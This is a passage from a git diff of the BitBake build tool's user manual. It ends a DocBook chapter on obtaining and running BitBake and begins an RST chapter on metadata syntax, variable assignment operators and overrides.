- version of the recipe.
- So, the append file would match the following recipe names:
- <literallayout class='monospaced'>
- busybox_1.21.1.bb
- busybox_1.21.2.bb
- busybox_1.21.3.bb
- </literallayout>
- <note><title>Important</title>
- The use of the "<filename>%</filename>" character
- is limited in that it only works directly in front of the
- <filename>.bbappend</filename> portion of the append file's
- name.
- You cannot use the wildcard character in any other
- location of the name.
- </note>
- If the <filename>busybox</filename> recipe was updated to
- <filename>busybox_1.3.0.bb</filename>, the append name would not
- match.
- However, if you named the append file
- <filename>busybox_1.%.bbappend</filename>, then you would have a match.
- </para>
-
- <para>
- In the most general case, you could name the append file something as
- simple as <filename>busybox_%.bbappend</filename> to be entirely
- version independent.
- </para>
- </section>
- </section>
-
- <section id='obtaining-bitbake'>
- <title>Obtaining BitBake</title>
-
- <para>
- You can obtain BitBake several different ways:
- <itemizedlist>
- <listitem><para><emphasis>Cloning BitBake:</emphasis>
- Using Git to clone the BitBake source code repository
- is the recommended method for obtaining BitBake.
- Cloning the repository makes it easy to get bug fixes
- and have access to stable branches and the master
- branch.
- Once you have cloned BitBake, you should use
- the latest stable
- branch for development since the master branch is for
- BitBake development and might contain less stable changes.
- </para>
- <para>You usually need a version of BitBake
- that matches the metadata you are using.
- The metadata is generally backwards compatible but
- not forward compatible.</para>
- <para>Here is an example that clones the BitBake repository:
- <literallayout class='monospaced'>
- $ git clone git://git.openembedded.org/bitbake
- </literallayout>
- This command clones the BitBake Git repository into a
- directory called <filename>bitbake</filename>.
- Alternatively, you can
- designate a directory after the
- <filename>git clone</filename> command
- if you want to call the new directory something
- other than <filename>bitbake</filename>.
- Here is an example that names the directory
- <filename>bbdev</filename>:
- <literallayout class='monospaced'>
- $ git clone git://git.openembedded.org/bitbake bbdev
- </literallayout></para></listitem>
- <listitem><para><emphasis>Installation using your Distribution
- Package Management System:</emphasis>
- This method is not
- recommended because the BitBake version that is
- provided by your distribution, in most cases,
- is several
- releases behind a snapshot of the BitBake repository.
- </para></listitem>
- <listitem><para><emphasis>Taking a snapshot of BitBake:</emphasis>
- Downloading a snapshot of BitBake from the
- source code repository gives you access to a known
- branch or release of BitBake.
- <note>
- Cloning the Git repository, as described earlier,
- is the preferred method for getting BitBake.
- Cloning the repository makes it easier to update as
- patches are added to the stable branches.
- </note></para>
- <para>The following example downloads a snapshot of
- BitBake version 1.17.0:
- <literallayout class='monospaced'>
- $ wget http://git.openembedded.org/bitbake/snapshot/bitbake-1.17.0.tar.gz
- $ tar zxpvf bitbake-1.17.0.tar.gz
- </literallayout>
- After extraction of the tarball using the tar utility,
- you have a directory entitled
- <filename>bitbake-1.17.0</filename>.
- </para></listitem>
- <listitem><para><emphasis>Using the BitBake that Comes With Your
- Build Checkout:</emphasis>
- A final possibility for getting a copy of BitBake is that it
- already comes with your checkout of a larger BitBake-based build
- system, such as Poky.
- Rather than manually checking out individual layers and
- gluing them together yourself, you can check
- out an entire build system.
- The checkout will already include a version of BitBake that
- has been thoroughly tested for compatibility with the other
- components.
- For information on how to check out a particular BitBake-based
- build system, consult that build system's supporting documentation.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id="bitbake-user-manual-command">
- <title>The BitBake Command</title>
-
- <para>
- The <filename>bitbake</filename> command is the primary interface
- to the BitBake tool.
- This section presents the BitBake command syntax and provides
- several execution examples.
- </para>
-
- <section id='usage-and-syntax'>
- <title>Usage and syntax</title>
-
- <para>
- Following is the usage and syntax for BitBake:
- <literallayout class='monospaced'>
- $ bitbake -h
- Usage: bitbake [options] [recipename/target recipe:do_task ...]
-
- Executes the specified task (default is 'build') for a given set of target recipes (.bb files).
- It is assumed there is a conf/bblayers.conf available in cwd or in BBPATH which
- will provide the layer, BBFILES and other configuration information.
-
- Options:
- --version show program's version number and exit
- -h, --help show this help message and exit
- -b BUILDFILE, --buildfile=BUILDFILE
- Execute tasks from a specific .bb recipe directly.
- WARNING: Does not handle any dependencies from other
- recipes.
- -k, --continue Continue as much as possible after an error. While the
- target that failed and anything depending on it cannot
- be built, as much as possible will be built before
- stopping.
- -f, --force Force the specified targets/task to run (invalidating
- any existing stamp file).
- -c CMD, --cmd=CMD Specify the task to execute. The exact options
- available depend on the metadata. Some examples might
- be 'compile' or 'populate_sysroot' or 'listtasks' may
- give a list of the tasks available.
- -C INVALIDATE_STAMP, --clear-stamp=INVALIDATE_STAMP
- Invalidate the stamp for the specified task such as
- 'compile' and then run the default task for the
- specified target(s).
- -r PREFILE, --read=PREFILE
- Read the specified file before bitbake.conf.
- -R POSTFILE, --postread=POSTFILE
- Read the specified file after bitbake.conf.
- -v, --verbose Enable tracing of shell tasks (with 'set -x'). Also
- print bb.note(...) messages to stdout (in addition to
- writing them to ${T}/log.do_&lt;task&gt;).
- -D, --debug Increase the debug level. You can specify this more
- than once. -D sets the debug level to 1, where only
- bb.debug(1, ...) messages are printed to stdout; -DD
- sets the debug level to 2, where both bb.debug(1, ...)
- and bb.debug(2, ...) messages are printed; etc.
- Without -D, no debug messages are printed. Note that
- -D only affects output to stdout. All debug messages
- are written to ${T}/log.do_taskname, regardless of the
- debug level.
- -q, --quiet Output less log message data to the terminal. You can
- specify this more than once.
- -n, --dry-run Don't execute, just go through the motions.
- -S SIGNATURE_HANDLER, --dump-signatures=SIGNATURE_HANDLER
- Dump out the signature construction information, with
- no task execution. The SIGNATURE_HANDLER parameter is
- passed to the handler. Two common values are none and
- printdiff but the handler may define more/less. none
- means only dump the signature, printdiff means compare
- the dumped signature with the cached one.
- -p, --parse-only Quit after parsing the BB recipes.
- -s, --show-versions Show current and preferred versions of all recipes.
- -e, --environment Show the global or per-recipe environment complete
- with information about where variables were
- set/changed.
- -g, --graphviz Save dependency tree information for the specified
- targets in the dot syntax.
- -I EXTRA_ASSUME_PROVIDED, --ignore-deps=EXTRA_ASSUME_PROVIDED
- Assume these dependencies don't exist and are already
- provided (equivalent to ASSUME_PROVIDED). Useful to
- make dependency graphs more appealing
- -l DEBUG_DOMAINS, --log-domains=DEBUG_DOMAINS
- Show debug logging for the specified logging domains
- -P, --profile Profile the command and save reports.
- -u UI, --ui=UI The user interface to use (knotty, ncurses or taskexp
- - default knotty).
- --token=XMLRPCTOKEN Specify the connection token to be used when
- connecting to a remote server.
- --revisions-changed Set the exit code depending on whether upstream
- floating revisions have changed or not.
- --server-only Run bitbake without a UI, only starting a server
- (cooker) process.
- -B BIND, --bind=BIND The name/address for the bitbake xmlrpc server to bind
- to.
- -T SERVER_TIMEOUT, --idle-timeout=SERVER_TIMEOUT
- Set timeout to unload bitbake server due to
- inactivity, set to -1 means no unload, default:
- Environment variable BB_SERVER_TIMEOUT.
- --no-setscene Do not run any setscene tasks. sstate will be ignored
- and everything needed, built.
- --setscene-only Only run setscene tasks, don't run any real tasks.
- --remote-server=REMOTE_SERVER
- Connect to the specified server.
- -m, --kill-server Terminate any running bitbake server.
- --observe-only Connect to a server as an observing-only client.
- --status-only Check the status of the remote bitbake server.
- -w WRITEEVENTLOG, --write-log=WRITEEVENTLOG
- Writes the event log of the build to a bitbake event
- json file. Use '' (empty string) to assign the name
- automatically.
- --runall=RUNALL Run the specified task for any recipe in the taskgraph
- of the specified target (even if it wouldn't otherwise
- have run).
- --runonly=RUNONLY Run only the specified task within the taskgraph of
- the specified targets (and any task dependencies those
- tasks may have).
- </literallayout>
- </para>
- </section>
-
- <section id='bitbake-examples'>
- <title>Examples</title>
-
- <para>
- This section presents some examples showing how to use BitBake.
- </para>
-
- <section id='example-executing-a-task-against-a-single-recipe'>
- <title>Executing a Task Against a Single Recipe</title>
-
- <para>
- Executing tasks for a single recipe file is relatively simple.
- You specify the file in question, and BitBake parses
- it and executes the specified task.
- If you do not specify a task, BitBake executes the default
- task, which is "buildâ€.
- BitBake obeys inter-task dependencies when doing
- so.
- </para>
-
- <para>
- The following command runs the build task, which is
- the default task, on the <filename>foo_1.0.bb</filename>
- recipe file:
- <literallayout class='monospaced'>
- $ bitbake -b foo_1.0.bb
- </literallayout>
- The following command runs the clean task on the
- <filename>foo.bb</filename> recipe file:
- <literallayout class='monospaced'>
- $ bitbake -b foo.bb -c clean
- </literallayout>
- <note>
- The "-b" option explicitly does not handle recipe
- dependencies.
- Other than for debugging purposes, it is instead
- recommended that you use the syntax presented in the
- next section.
- </note>
- </para>
- </section>
-
- <section id='executing-tasks-against-a-set-of-recipe-files'>
- <title>Executing Tasks Against a Set of Recipe Files</title>
-
- <para>
- There are a number of additional complexities introduced
- when one wants to manage multiple <filename>.bb</filename>
- files.
- Clearly there needs to be a way to tell BitBake what
- files are available and, of those, which you
- want to execute.
- There also needs to be a way for each recipe
- to express its dependencies, both for build-time and
- runtime.
- There must be a way for you to express recipe preferences
- when multiple recipes provide the same functionality, or when
- there are multiple versions of a recipe.
- </para>
-
- <para>
- The <filename>bitbake</filename> command, when not using
- "--buildfile" or "-b" only accepts a "PROVIDES".
- You cannot provide anything else.
- By default, a recipe file generally "PROVIDES" its
- "packagename" as shown in the following example:
- <literallayout class='monospaced'>
- $ bitbake foo
- </literallayout>
- This next example "PROVIDES" the package name and also uses
- the "-c" option to tell BitBake to just execute the
- <filename>do_clean</filename> task:
- <literallayout class='monospaced'>
- $ bitbake -c clean foo
- </literallayout>
- </para>
- </section>
-
- <section id='executing-a-list-of-task-and-recipe-combinations'>
- <title>Executing a List of Task and Recipe Combinations</title>
-
- <para>
- The BitBake command line supports specifying different
- tasks for individual targets when you specify multiple
- targets.
- For example, suppose you had two targets (or recipes)
- <filename>myfirstrecipe</filename> and
- <filename>mysecondrecipe</filename> and you needed
- BitBake to run <filename>taskA</filename> for the first
- recipe and <filename>taskB</filename> for the second
- recipe:
- <literallayout class='monospaced'>
- $ bitbake myfirstrecipe:do_taskA mysecondrecipe:do_taskB
- </literallayout>
- </para>
- </section>
-
- <section id='generating-dependency-graphs'>
- <title>Generating Dependency Graphs</title>
-
- <para>
- BitBake is able to generate dependency graphs using
- the <filename>dot</filename> syntax.
- You can convert these graphs into images using the
- <filename>dot</filename> tool from
- <ulink url='http://www.graphviz.org'>Graphviz</ulink>.
- </para>
-
- <para>
- When you generate a dependency graph, BitBake writes two files
- to the current working directory:
- <itemizedlist>
- <listitem><para>
- <emphasis><filename>task-depends.dot</filename>:</emphasis>
- Shows dependencies between tasks.
- These dependencies match BitBake's internal task execution list.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>pn-buildlist</filename>:</emphasis>
- Shows a simple list of targets that are to be built.
- </para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- To stop depending on common depends, use the "-I" depend
- option and BitBake omits them from the graph.
- Leaving this information out can produce more readable graphs.
- This way, you can remove from the graph
- <filename>DEPENDS</filename> from inherited classes
- such as <filename>base.bbclass</filename>.
- </para>
-
- <para>
- Here are two examples that create dependency graphs.
- The second example omits depends common in OpenEmbedded from
- the graph:
- <literallayout class='monospaced'>
- $ bitbake -g foo
-
- $ bitbake -g -I virtual/kernel -I eglibc foo
- </literallayout>
- </para>
- </section>
-
- <section id='executing-a-multiple-configuration-build'>
- <title>Executing a Multiple Configuration Build</title>
-
- <para>
- BitBake is able to build multiple images or packages
- using a single command where the different targets
- require different configurations (multiple configuration
- builds).
- Each target, in this scenario, is referred to as a
- "multiconfig".
- </para>
-
- <para>
- To accomplish a multiple configuration build, you must
- define each target's configuration separately using
- a parallel configuration file in the build directory.
- The location for these multiconfig configuration files
- is specific.
- They must reside in the current build directory in
- a sub-directory of <filename>conf</filename> named
- <filename>multiconfig</filename>.
- Following is an example for two separate targets:
- <imagedata fileref="figures/bb_multiconfig_files.png" align="center" width="4in" depth="3in" />
- </para>
-
- <para>
- The reason for this required file hierarchy
- is because the <filename>BBPATH</filename> variable
- is not constructed until the layers are parsed.
- Consequently, using the configuration file as a
- pre-configuration file is not possible unless it is
- located in the current working directory.
- </para>
-
- <para>
- Minimally, each configuration file must define the
- machine and the temporary directory BitBake uses
- for the build.
- Suggested practice dictates that you do not
- overlap the temporary directories used during the
- builds.
- </para>
-
- <para>
- Aside from separate configuration files for each
- target, you must also enable BitBake to perform multiple
- configuration builds.
- Enabling is accomplished by setting the
- <link linkend='var-bb-BBMULTICONFIG'><filename>BBMULTICONFIG</filename></link>
- variable in the <filename>local.conf</filename>
- configuration file.
- As an example, suppose you had configuration files
- for <filename>target1</filename> and
- <filename>target2</filename> defined in the build
- directory.
- The following statement in the
- <filename>local.conf</filename> file both enables
- BitBake to perform multiple configuration builds and
- specifies the two extra multiconfigs:
- <literallayout class='monospaced'>
- BBMULTICONFIG = "target1 target2"
- </literallayout>
- </para>
-
- <para>
- Once the target configuration files are in place and
- BitBake has been enabled to perform multiple configuration
- builds, use the following command form to start the
- builds:
- <literallayout class='monospaced'>
- $ bitbake [mc:<replaceable>multiconfigname</replaceable>:]<replaceable>target</replaceable> [[[mc:<replaceable>multiconfigname</replaceable>:]<replaceable>target</replaceable>] ... ]
- </literallayout>
- Here is an example for two extra multiconfigs:
- <filename>target1</filename> and
- <filename>target2</filename>:
- <literallayout class='monospaced'>
- $ bitbake mc::<replaceable>target</replaceable> mc:target1:<replaceable>target</replaceable> mc:target2:<replaceable>target</replaceable>
- </literallayout>
- </para>
- </section>
-
- <section id='bb-enabling-multiple-configuration-build-dependencies'>
- <title>Enabling Multiple Configuration Build Dependencies</title>
-
- <para>
- Sometimes dependencies can exist between targets
- (multiconfigs) in a multiple configuration build.
- For example, suppose that in order to build an image
- for a particular architecture, the root filesystem of
- another build for a different architecture needs to
- exist.
- In other words, the image for the first multiconfig depends
- on the root filesystem of the second multiconfig.
- This dependency is essentially that the task in the recipe
- that builds one multiconfig is dependent on the
- completion of the task in the recipe that builds
- another multiconfig.
- </para>
-
- <para>
- To enable dependencies in a multiple configuration
- build, you must declare the dependencies in the recipe
- using the following statement form:
- <literallayout class='monospaced'>
- <replaceable>task_or_package</replaceable>[mcdepends] = "mc:<replaceable>from_multiconfig</replaceable>:<replaceable>to_multiconfig</replaceable>:<replaceable>recipe_name</replaceable>:<replaceable>task_on_which_to_depend</replaceable>"
- </literallayout>
- To better show how to use this statement, consider an
- example with two multiconfigs: <filename>target1</filename>
- and <filename>target2</filename>:
- <literallayout class='monospaced'>
- <replaceable>image_task</replaceable>[mcdepends] = "mc:target1:target2:<replaceable>image2</replaceable>:<replaceable>rootfs_task</replaceable>"
- </literallayout>
- In this example, the
- <replaceable>from_multiconfig</replaceable> is "target1" and
- the <replaceable>to_multiconfig</replaceable> is "target2".
- The task on which the image whose recipe contains
- <replaceable>image_task</replaceable> depends on the
- completion of the <replaceable>rootfs_task</replaceable>
- used to build out <replaceable>image2</replaceable>, which
- is associated with the "target2" multiconfig.
- </para>
-
- <para>
- Once you set up this dependency, you can build the
- "target1" multiconfig using a BitBake command as follows:
- <literallayout class='monospaced'>
- $ bitbake mc:target1:<replaceable>image1</replaceable>
- </literallayout>
- This command executes all the tasks needed to create
- <replaceable>image1</replaceable> for the "target1"
- multiconfig.
- Because of the dependency, BitBake also executes through
- the <replaceable>rootfs_task</replaceable> for the "target2"
- multiconfig build.
- </para>
-
- <para>
- Having a recipe depend on the root filesystem of another
- build might not seem that useful.
- Consider this change to the statement in the
- <replaceable>image1</replaceable> recipe:
- <literallayout class='monospaced'>
- <replaceable>image_task</replaceable>[mcdepends] = "mc:target1:target2:<replaceable>image2</replaceable>:<replaceable>image_task</replaceable>"
- </literallayout>
- In this case, BitBake must create
- <replaceable>image2</replaceable> for the "target2"
- build since the "target1" build depends on it.
- </para>
-
- <para>
- Because "target1" and "target2" are enabled for multiple
- configuration builds and have separate configuration
- files, BitBake places the artifacts for each build in the
- respective temporary build directories.
- </para>
- </section>
- </section>
- </section>
-</chapter>
diff --git a/bitbake/doc/bitbake-user-manual/bitbake-user-manual-metadata.rst b/bitbake/doc/bitbake-user-manual/bitbake-user-manual-metadata.rst
new file mode 100644
index 0000000000..7ea68ade72
--- /dev/null
+++ b/bitbake/doc/bitbake-user-manual/bitbake-user-manual-metadata.rst
@@ -0,0 +1,1969 @@
+.. SPDX-License-Identifier: CC-BY-2.5
+
+====================
+Syntax and Operators
+====================
+
+|
+
+BitBake files have their own syntax. The syntax has similarities to
+several other languages but also has some unique features. This section
+describes the available syntax and operators as well as provides
+examples.
+
+Basic Syntax
+============
+
+This section provides some basic syntax examples.
+
+Basic Variable Setting
+----------------------
+
+The following example sets ``VARIABLE`` to "value". This assignment
+occurs immediately as the statement is parsed. It is a "hard"
+assignment. ::
+
+ VARIABLE = "value"
+
+As expected, if you include leading or
+trailing spaces as part of an assignment, the spaces are retained: ::
+
+ VARIABLE = " value"
+ VARIABLE = "value "
+
+Setting ``VARIABLE`` to "" sets
+it to an empty string, while setting the variable to " " sets it to a
+blank space (i.e. these are not the same values). ::
+
+ VARIABLE = ""
+ VARIABLE = " "
+
+You can use single quotes instead of double quotes when setting a
+variable's value. Doing so allows you to use values that contain the
+double quote character: ::
+
+ VARIABLE = 'I have a " in my value'
+
+.. note::
+
+ Unlike in Bourne shells, single quotes work identically to double
+ quotes in all other ways. They do not suppress variable expansions.
+
+Modifying Existing Variables
+----------------------------
+
+Sometimes you need to modify existing variables. Following are some
+cases where you might find you want to modify an existing variable:
+
+- Customize a recipe that uses the variable.
+
+- Change a variable's default value used in a ``*.bbclass`` file.
+
+- Change the variable in a ``*.bbappend`` file to override the variable
+ in the original recipe.
+
+- Change the variable in a configuration file so that the value
+ overrides an existing configuration.
+
+Changing a variable value can sometimes depend on how the value was
+originally assigned and also on the desired intent of the change. In
+particular, when you append a value to a variable that has a default
+value, the resulting value might not be what you expect. In this case,
+the value you provide might replace the value rather than append to the
+default value.
+
+If after you have changed a variable's value and something unexplained
+occurs, you can use BitBake to check the actual value of the suspect
+variable. You can make these checks for both configuration and recipe
+level changes:
+
+- For configuration changes, use the following: ::
+
+ $ bitbake -e
+
+ This
+ command displays variable values after the configuration files (i.e.
+ ``local.conf``, ``bblayers.conf``, ``bitbake.conf`` and so forth)
+ have been parsed.
+
+ .. note::
+
+ Variables that are exported to the environment are preceded by the
+ string "export" in the command's output.
+
+- For recipe changes, use the following: ::
+
+ $ bitbake recipe -e \| grep VARIABLE="
+
+ This command checks to see if the variable actually makes
+ it into a specific recipe.
+
+Line Joining
+------------
+
+Outside of :ref:`functions <bitbake-user-manual/bitbake-user-manual-metadata:functions>`,
+BitBake joins any line ending in
+a backslash character ("\") with the following line before parsing
+statements. The most common use for the "\" character is to split
+variable assignments over multiple lines, as in the following example: ::
+
+ FOO = "bar \
+ baz \
+ qaz"
+
+Both the "\" character and the newline
+character that follow it are removed when joining lines. Thus, no
+newline characters end up in the value of ``FOO``.
+
+Consider this additional example where the two assignments both assign
+"barbaz" to ``FOO``: ::
+
+ FOO = "barbaz"
+ FOO = "bar\
+ baz"
+
+.. note::
+
+ BitBake does not interpret escape sequences like "\n" in variable
+ values. For these to have an effect, the value must be passed to some
+ utility that interprets escape sequences, such as
+ ``printf`` or ``echo -n``.
+
+Variable Expansion
+------------------
+
+Variables can reference the contents of other variables using a syntax
+that is similar to variable expansion in Bourne shells. The following
+assignments result in A containing "aval" and B evaluating to
+"preavalpost". ::
+
+ A = "aval"
+ B = "pre${A}post"
+
+.. note::
+
+ Unlike in Bourne shells, the curly braces are mandatory: Only ``${FOO}`` and not
+ ``$FOO`` is recognized as an expansion of ``FOO``.
+
+The "=" operator does not immediately expand variable references in the
+right-hand side. Instead, expansion is deferred until the variable
+assigned to is actually used. The result depends on the current values
+of the referenced variables. The following example should clarify this
+behavior: ::
+
+ A = "${B} baz"
+ B = "${C} bar"
+ C = "foo"
+ *At this point, ${A} equals "foo bar baz"*
+ C = "qux"
+ *At this point, ${A} equals "qux bar baz"*
+ B = "norf"
+ *At this point, ${A} equals "norf baz"\*
+
+Contrast this behavior with the
+:ref:`bitbake-user-manual/bitbake-user-manual-metadata:immediate variable
+expansion (:=)` operator.
+
+If the variable expansion syntax is used on a variable that does not
+exist, the string is kept as is. For example, given the following
+assignment, ``BAR`` expands to the literal string "${FOO}" as long as
+``FOO`` does not exist. ::
+
+ BAR = "${FOO}"
+
+Setting a default value (?=)
+----------------------------
+
+You can use the "?=" operator to achieve a "softer" assignment for a
+variable. This type of assignment allows you to define a variable if it
+is undefined when the statement is parsed, but to leave the value alone
+if the variable has a value. Here is an example: ::
+
+ A ?= "aval"
+
+If ``A`` is
+set at the time this statement is parsed, the variable retains its
+value. However, if ``A`` is not set, the variable is set to "aval".
+
+.. note::
+
+ This assignment is immediate. Consequently, if multiple "?="
+ assignments to a single variable exist, the first of those ends up
+ getting used.
+
+Setting a weak default value (??=)
+----------------------------------
+
+It is possible to use a "weaker" assignment than in the previous section
+by using the "??=" operator. This assignment behaves identical to "?="
+except that the assignment is made at the end of the parsing process
+rather than immediately. Consequently, when multiple "??=" assignments
+exist, the last one is used. Also, any "=" or "?=" assignment will
+override the value set with "??=". Here is an example: ::
+
+ A ??= "somevalue"
+ A ??= "someothervalue"
+
+If ``A`` is set before the above statements are
+parsed, the variable retains its value. If ``A`` is not set, the
+variable is set to "someothervalue".
+
+Again, this assignment is a "lazy" or "weak" assignment because it does
+not occur until the end of the parsing process.
+
+Immediate variable expansion (:=)
+---------------------------------
+
+The ":=" operator results in a variable's contents being expanded
+immediately, rather than when the variable is actually used: ::
+
+ T = "123"
+ A := "test ${T}"
+ T = "456"
+ B := "${T} ${C}"
+ C = "cval"
+ C := "${C}append"
+
+In this example, ``A`` contains "test 123", even though the final value
+of ``T`` is "456". The variable ``B`` will end up containing "456
+cvalappend". This is because references to undefined variables are
+preserved as is during (immediate)expansion. This is in contrast to GNU
+Make, where undefined variables expand to nothing. The variable ``C``
+contains "cvalappend" since ``${C}`` immediately expands to "cval".
+
+.. _appending-and-prepending:
+
+Appending (+=) and prepending (=+) With Spaces
+----------------------------------------------
+
+Appending and prepending values is common and can be accomplished using
+the "+=" and "=+" operators. These operators insert a space between the
+current value and prepended or appended value.
+
+These operators take immediate effect during parsing. Here are some
+examples: ::
+
+ B = "bval"
+ B += "additionaldata"
+ C = "cval"
+ C =+ "test"
+
+The variable ``B`` contains "bval additionaldata" and ``C`` contains "test
+cval".
+
+.. _appending-and-prepending-without-spaces:
+
+Appending (.=) and Prepending (=.) Without Spaces
+-------------------------------------------------
+
+If you want to append or prepend values without an inserted space, use
+the ".=" and "=." operators.
+
+These operators take immediate effect during parsing. Here are some
+examples: ::
+
+ B = "bval"
+ B .= "additionaldata"
+ C = "cval"
+ C =. "test"
+
+The variable ``B`` contains "bvaladditionaldata" and ``C`` contains
+"testcval".
+
+Appending and Prepending (Override Style Syntax)
+------------------------------------------------
+
+You can also append and prepend a variable's value using an override
+style syntax. When you use this syntax, no spaces are inserted.
+
+These operators differ from the ":=", ".=", "=.", "+=", and "=+"
+operators in that their effects are applied at variable expansion time
+rather than being immediately applied. Here are some examples: ::
+
+ B = "bval"
+ B_append = " additional data"
+ C = "cval"
+ C_prepend = "additional data "
+ D = "dval"
+ D_append = "additional data"
+
+The variable ``B``
+becomes "bval additional data" and ``C`` becomes "additional data cval".
+The variable ``D`` becomes "dvaladditional data".
+
+.. note::
+
+ You must control all spacing when you use the override syntax.
+
+It is also possible to append and prepend to shell functions and
+BitBake-style Python functions. See the ":ref:`bitbake-user-manual/bitbake-user-manual-metadata:shell functions`" and ":ref:`bitbake-user-manual/bitbake-user-manual-metadata:bitbake-style python functions`"
+sections for examples.
+
+.. _removing-override-style-syntax:
+
+Removal (Override Style Syntax)
+-------------------------------
+
+You can remove values from lists using the removal override style
+syntax. Specifying a value for removal causes all occurrences of that
+value to be removed from the variable.
+
+When you use this syntax, BitBake expects one or more strings.
+Surrounding spaces and spacing are preserved. Here is an example: ::
+
+ FOO = "123 456 789 123456 123 456 123 456"
+ FOO_remove = "123"
+ FOO_remove = "456"
+ FOO2 = " abc def ghi abcdef abc def abc def def"
+ FOO2_remove = "\
+ def \
+ abc \
+ ghi \
+ "
+
+The variable ``FOO`` becomes
+" 789 123456 " and ``FOO2`` becomes " abcdef ".
+
+Like "_append" and "_prepend", "_remove" is applied at variable
+expansion time.
+
+Override Style Operation Advantages
+-----------------------------------
+
+An advantage of the override style operations "_append", "_prepend", and
+"_remove" as compared to the "+=" and "=+" operators is that the
+override style operators provide guaranteed operations. For example,
+consider a class ``foo.bbclass`` that needs to add the value "val" to
+the variable ``FOO``, and a recipe that uses ``foo.bbclass`` as follows: ::
+
+ inherit foo
+ FOO = "initial"
+
+If ``foo.bbclass`` uses the "+=" operator,
+as follows, then the final value of ``FOO`` will be "initial", which is
+not what is desired: ::
+
+ FOO += "val"
+
+If, on the other hand, ``foo.bbclass``
+uses the "_append" operator, then the final value of ``FOO`` will be
+"initial val", as intended: ::
+
+ FOO_append = " val"
+
+.. note::
+
+ It is never necessary to use "+=" together with "_append". The following
+ sequence of assignments appends "barbaz" to FOO: ::
+
+ FOO_append = "bar"
+ FOO_append = "baz"
+
+
+ The only effect of changing the second assignment in the previous
+ example to use "+=" would be to add a space before "baz" in the
+ appended value (due to how the "+=" operator works).
+
+Another advantage of the override style operations is that you can
+combine them with other overrides as described in the
+":ref:`bitbake-user-manual/bitbake-user-manual-metadata:conditional syntax (overrides)`" section.
+
+Variable Flag Syntax
+--------------------
+
+Variable flags are BitBake's implementation of variable properties or
+attributes. It is a way of tagging extra information onto a variable.
+You can find more out about variable flags in general in the
+":ref:`bitbake-user-manual/bitbake-user-manual-metadata:variable flags`" section.
+
+You can define, append, and prepend values to variable flags. All the
+standard syntax operations previously mentioned work for variable flags
+except for override style syntax (i.e. "_prepend", "_append", and
+"_remove").
+
+Here are some examples showing how to set variable flags: ::
+
+ FOO[a] = "abc"
+ FOO[b] = "123"
+ FOO[a] += "456"
+
+The variable ``FOO`` has two flags:
+``[a]`` and ``[b]``. The flags are immediately set to "abc" and "123",
+respectively. The ``[a]`` flag becomes "abc 456".
+
+No need exists to pre-define variable flags. You can simply start using
+them. One extremely common application is to attach some brief
+documentation to a BitBake variable as follows: ::
+
+ CACHE[doc] = "The directory holding the cache of the metadata."
+
+Inline Python Variable Expansion
+--------------------------------
+
+You can use inline Python variable expansion to set variables. Here is
+an example: ::
+
+ DATE = "${@time.strftime('%Y%m%d',time.gmtime())}"
+
+This example results in the ``DATE`` variable being set to the current date.
+
+Probably the most common use of this feature is to extract the value of
+variables from BitBake's internal data dictionary, ``d``. The following
+lines select the values of a package name and its version number,
+respectively: ::
+
+ PN = "${@bb.parse.BBHandler.vars_from_file(d.getVar('FILE', False),d)[0] or 'defaultpkgname'}"
+ PV = "${@bb.parse.BBHandler.vars_from_file(d.getVar('FILE', False),d)[1] or '1.0'}"
+
+.. note::
+
+ Inline Python expressions work just like variable expansions insofar as the
+ "=" and ":=" operators are concerned. Given the following assignment, foo()
+ is called each time FOO is expanded: ::
+
+ FOO = "${@foo()}"
+
+ Contrast this with the following immediate assignment, where foo() is only
+ called once, while the assignment is parsed: ::
+
+ FOO := "${@foo()}"
+
+For a different way to set variables with Python code during parsing,
+see the
+":ref:`bitbake-user-manual/bitbake-user-manual-metadata:anonymous python functions`" section.
+
+Unsetting variables
+-------------------
+
+It is possible to completely remove a variable or a variable flag from
+BitBake's internal data dictionary by using the "unset" keyword. Here is
+an example: ::
+
+ unset DATE
+ unset do_fetch[noexec]
+
+These two statements remove the ``DATE`` and the ``do_fetch[noexec]`` flag.
+
+Providing Pathnames
+-------------------
+
+When specifying pathnames for use with BitBake, do not use the tilde
+("~") character as a shortcut for your home directory. Doing so might
+cause BitBake to not recognize the path since BitBake does not expand
+this character in the same way a shell would.
+
+Instead, provide a fuller path as the following example illustrates: ::
+
+ BBLAYERS ?= " \
+ /home/scott-lenovo/LayerA \
+ "
+
+Exporting Variables to the Environment
+======================================
+
+You can export variables to the environment of running tasks by using
+the ``export`` keyword. For example, in the following example, the
+``do_foo`` task prints "value from the environment" when run: ::
+
+ export ENV_VARIABLE
+ ENV_VARIABLE = "value from the environment"
+
+ do_foo() {
+ bbplain "$ENV_VARIABLE"
+ }
+
+.. note::
+
+ BitBake does not expand ``$ENV_VARIABLE`` in this case because it lacks the
+ obligatory ``{}`` . Rather, ``$ENV_VARIABLE`` is expanded by the shell.
+
+It does not matter whether ``export ENV_VARIABLE`` appears before or
+after assignments to ``ENV_VARIABLE``.
+
+It is also possible to combine ``export`` with setting a value for the
+variable. Here is an example: ::
+
+ export ENV_VARIABLE = "variable-value"
+
+In the output of ``bitbake -e``, variables that are exported to the
+environment are preceded by "export".
+
+Among the variables commonly exported to the environment are ``CC`` and
+``CFLAGS``, which are picked up by many build systems.
+
+Conditional Syntax (Overrides)
+==============================
+
+BitBake uses :term:`OVERRIDES` to control what
+variables are overridden after BitBake parses recipes and configuration
+files. This section describes how you can use ``OVERRIDES`` as
+conditional metadata, talks about key expansion in relationship to
+``OVERRIDES``, and provides some examples to help with understanding.
+
+Conditional Metadata
+--------------------
+
+You can use ``OVERRIDES`` to conditionally select a specific version of
+a variable and to conditionally append or prepend the value of a
+variable.
+
+.. note::
+
+ Overrides can only use lower-case characters. Additionally,
+ underscores are not permitted in override names as they are used to
+ separate overrides from each other and from the variable name.
+
+- *Selecting a Variable:* The ``OVERRIDES`` variable is a
+ colon-character-separated list that contains items for which you want
+ to satisfy conditions. Thus, if you have a variable that is
+ conditional on "arm", and "arm" is in ``OVERRIDES``, then the
+ "arm"-specific version of the variable is used rather than the
+ non-conditional version. Here is an example: ::
+
+ OVERRIDES = "architecture:os:machine"
+ TEST = "default"
+ TEST_os = "osspecific"
+ TEST_nooverride = "othercondvalue"
+
+ In this example, the ``OVERRIDES``
+ variable lists three overrides: "architecture", "os", and "machine".
+ The variable ``TEST`` by itself has a default value of "default". You
+ select the os-specific version of the ``TEST`` variable by appending
